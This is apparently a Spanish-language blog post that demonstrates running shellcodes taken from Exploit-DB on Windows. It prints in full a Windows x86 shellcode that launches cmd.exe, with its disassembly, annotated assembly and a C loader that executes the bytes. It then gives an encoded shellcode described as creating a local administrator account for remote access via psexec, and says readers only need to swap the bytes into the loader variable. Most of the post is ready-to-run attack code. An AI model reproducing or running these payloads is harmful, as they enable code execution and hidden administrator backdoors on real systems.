Hoy quería jugar con vosotros con algunas shellcodes publicadas en Exploit-DB cómo la siguiente, con la que ejecutaremos una consola de comandos:
/* # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode # Author : Roziul Hasan Khan Shifat # Date : 15-08-2016 # Tested On : Windows 7 x86*//*Disassembly of section .text:00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 31 db xor %ebx,%ebx 14: 8b 59 3c mov 0x3c(%ecx),%ebx 17: 01 cb add %ecx,%ebx 19: 8b 5b 78 mov 0x78(%ebx),%ebx 1c: 01 cb add %ecx,%ebx 1e: 8b 73 20 mov 0x20(%ebx),%esi 21: 01 ce add %ecx,%esi 23: 31 d2 xor %edx,%edx00000025 <func>: 25: 42 inc %edx 26: ad lods %ds:(%esi),%eax 27: 01 c8 add %ecx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 <func> 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 <func> 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 <func> 43: 8b 73 1c mov 0x1c(%ebx),%esi 46: 01 ce add %ecx,%esi 48: 8b 14 96 mov (%esi,%edx,4),%edx 4b: 01 ca add %ecx,%edx 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 db xor %ebx,%ebx 53: 68 79 41 41 41 push $0x41414179 58: 66 89 5c 24 01 mov %bx,0x1(%esp) 5d: 68 65 6d 6f 72 push $0x726f6d65 62: 68 65 72 6f 4d push $0x4d6f7265 67: 68 52 74 6c 5a push $0x5a6c7452 6c: 54 push %esp 6d: 51 push %ecx 6e: ff d2 call *%edx 70: 83 c4 10 add $0x10,%esp 73: 31 c9 xor %ecx,%ecx 75: 89 ca mov %ecx,%edx 77: b2 54 mov $0x54,%dl 79: 51 push %ecx 7a: 83 ec 54 sub $0x54,%esp 7d: 8d 0c 24 lea (%esp),%ecx 80: 51 push %ecx 81: 52 push %edx 82: 51 push %ecx 83: ff d0 call *%eax 85: 59 pop %ecx 86: 31 d2 xor %edx,%edx 88: 68 73 41 42 42 push $0x42424173 8d: 66 89 54 24 02 mov %dx,0x2(%esp) 92: 68 6f 63 65 73 push $0x7365636f 97: 68 74 65 50 72 push $0x72506574 9c: 68 43 72 65 61 push $0x61657243 a1: 8d 14 24 lea (%esp),%edx a4: 51 push %ecx a5: 52 push %edx a6: 57 push %edi a7: ff d6 call *%esi a9: 59 pop %ecx aa: 83 c4 10 add $0x10,%esp ad: 31 db xor %ebx,%ebx af: 68 65 78 65 41 push $0x41657865 b4: 88 5c 24 03 mov %bl,0x3(%esp) b8: 68 63 6d 64 2e push $0x2e646d63 bd: 8d 1c 24 lea (%esp),%ebx c0: 31 d2 xor %edx,%edx c2: b2 44 mov $0x44,%dl c4: 89 11 mov %edx,(%ecx) c6: 8d 51 44 lea 0x44(%ecx),%edx c9: 56 push %esi ca: 31 f6 xor %esi,%esi cc: 52 push %edx cd: 51 push %ecx ce: 56 push %esi cf: 56 push %esi d0: 56 push %esi d1: 56 push %esi d2: 56 push %esi d3: 56 push %esi d4: 53 push %ebx d5: 56 push %esi d6: ff d0 call *%eax d8: 5e pop %esi d9: 83 c4 08 add $0x8,%esp dc: 31 db xor %ebx,%ebx de: 68 65 73 73 41 push $0x41737365 e3: 88 5c 24 03 mov %bl,0x3(%esp) e7: 68 50 72 6f 63 push $0x636f7250 ec: 68 45 78 69 74 push $0x74697845 f1: 8d 1c 24 lea (%esp),%ebx f4: 53 push %ebx f5: 57 push %edi f6: ff d6 call *%esi f8: 31 c9 xor %ecx,%ecx fa: 51 push %ecx fb: ff d0 call *%eax*//*section .text global _start_start:xor ecx,ecxmov eax,[fs:ecx+0x30] ;PEBmov eax,[eax+0xc] ;PEB->ldrmov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleListlodsdxchg esi,eaxlodsdmov ecx,[eax+0x10] ;kernel32 base addressxor ebx,ebxmov ebx,[ecx+0x3c] ;DOS->elf_anewadd ebx,ecx ;PE HEADERmov ebx,[ebx+0x78] ;DataDirectory->VirtualAddressadd ebx,ecx ;IMAGE_EXPORT_DIRECTORYmov esi,[ebx+0x20] ;AddressOfNamesadd esi,ecx;---------------------------------------------xor edx,edxfunc:inc edxlodsdadd eax,ecxcmp dword [eax],'GetP'jnz funccmp dword [eax+4],'rocA'jnz funccmp dword [eax+8],'ddre'jnz func;--------------------------------mov esi,[ebx+0x1c] ;AddressOfFunctionsadd esi,ecxmov edx,[esi+edx*4]add edx,ecx ;GetProcAddress();-------------------------------------mov esi,edxmov edi,ecx;-------------------------xor ebx,ebx;finding address of RtlZeroMemory()push 0x41414179mov [esp+1],word bxpush 0x726f6d65push 0x4d6f7265push 0x5a6c7452push esppush ecxcall edx;------------------------------add esp,16;-----------------------------------;zero out 84 bytesxor ecx,ecxmov edx,ecxmov dl,84push ecxsub esp,84lea ecx,[esp]push ecxpush edxpush ecxcall eax;----------------------------;finding address of CreateProcessA()pop ecxxor edx,edxpush 0x42424173mov [esp+2],word dxpush 0x7365636fpush 0x72506574push 0x61657243lea edx,[esp]push ecxpush edxpush edicall esi;--------------------------------;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION)pop ecxadd esp,16xor ebx,ebxpush 0x41657865mov [esp+3],byte blpush 0x2e646d63lea ebx,[esp]xor edx,edxmov dl,68mov [ecx],edxlea edx,[ecx+68]push esi ;xor esi,esipush edxpush ecxpush esipush esipush esipush esipush esipush esipush ebxpush esicall eaxpop esi;-------------------------------------;finding address of ExitProcess()add esp,8xor ebx,ebxpush 0x41737365mov [esp+3],byte blpush 0x636f7250push 0x74697845lea ebx,[esp]push ebxpush edicall esixor ecx,ecxpush ecxcall eax*/#include<stdio.h>#include<string.h>char shellcode[]=\"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";main(){printf("shellcode lenght %ld\n",(long)strlen(shellcode));(* (int(*)()) shellcode) ();}
Aquí vemos un ejemplo de su ejecución:
Muy útil también es crearnos un usuario administrador local, con el que podamos acceder remotamente a través de psexec por ejemplo, cómo en este otro ejemplo que tenemos a continuación:
"\xda\xde\xd9\x74\x24\xf4\xb8\x22\xd2\x27\x7a\x29\xc9\xb1\x4b""\x5b\x31\x43\x1a\x83\xeb\xfc\x03\x43\x16\xe2\xd7\x3b\xbc\x7a""\x17\xbc\x95\x4b\xd7\xd8\x92\xec\xe7\xa5\x65\x94\x08\x2d\x25""\x69\x9d\x41\xba\xdc\x2a\xe1\xca\xf7\x25\xe2\xca\x07\xbe\xa2""\xfe\x8a\x80\x5e\x74\xd4\x3c\xc1\x49\xb5\xb7\x91\x69\x12\x4c""\x2c\x4e\xd1\x06\xaa\xd6\xe4\x4c\x3f\x6c\xff\x1b\x1a\x51\xfe""\xf0\x78\xa5\x49\x8d\x4b\x4d\x48\x7f\x82\xae\x7a\xbf\x19\xfc""\xf9\xff\x96\xfa\xc0\x30\x5b\x04\x04\x25\x90\x3d\xf6\x9d\x71""\x37\xe7\x56\xdb\x93\xe6\x83\xba\x50\xe4\x18\xc8\x3d\xe9\x9f""\x25\x4a\x15\x14\xb8\xa5\x9f\x6e\x9f\x29\xc1\xad\x72\x01\x53""\xd9\x27\x5d\xac\xe6\xb1\xa5\xd2\xdc\xca\xa9\xd4\xdc\x4b\x6e""\xd0\xdc\x4b\x71\xe0\x12\x3e\x97\xd1\x42\xd8\x57\xd6\x92\x43""\xa9\x5c\x9c\x0d\x8e\x83\xd3\x70\xc2\x4c\x13\x73\x1b\xc4\xf6""\x9b\x43\x29\x07\xa4\xfd\x17\x1c\xb9\xa0\x1a\x9f\x3a\xd4\xd4""\xde\x82\xee\x16\xe0\x04\x07\xa0\x1f\xfb\x28\x26\xd1\x5f\xe6""\x79\xbd\x0c\xf7\x2f\x39\x82\xc7\x80\xbe\xb1\xcf\xc8\xad\xc5""\x2f\xf7\x4e\x57\xb4\x26\xf5\xdf\x51\x17\xda\x7c\xba\x39\x41""\xf7\x9a\xb0\xfa\x92\xa8\x1a\x8f\x39\x2e\x2e\x06\xa6\x80\xf0""\xb5\x16\x8f\x9b\x65\x78\x2e\x38\x01\xa6\x96\xe6\xe9\xc8\xb3""\x92\xc9\x78\x53\x38\x68\xed\xcc\xcc\x05\x98\x62\x11\xb8\x06""\xee\x38\x54\xae\x83\xce\xda\x51\x10\x40\x68\xe1\xf8\xed\xe9""\x66\x8c\x78\x95\x58\x4e\x54\x34\xfd\xea\xaa";Recordad que simplemente debemos modificar en la variable "sc" el contenido de la shellcode, ¡nada más!
Saludos!
No hay comentarios:
Publicar un comentario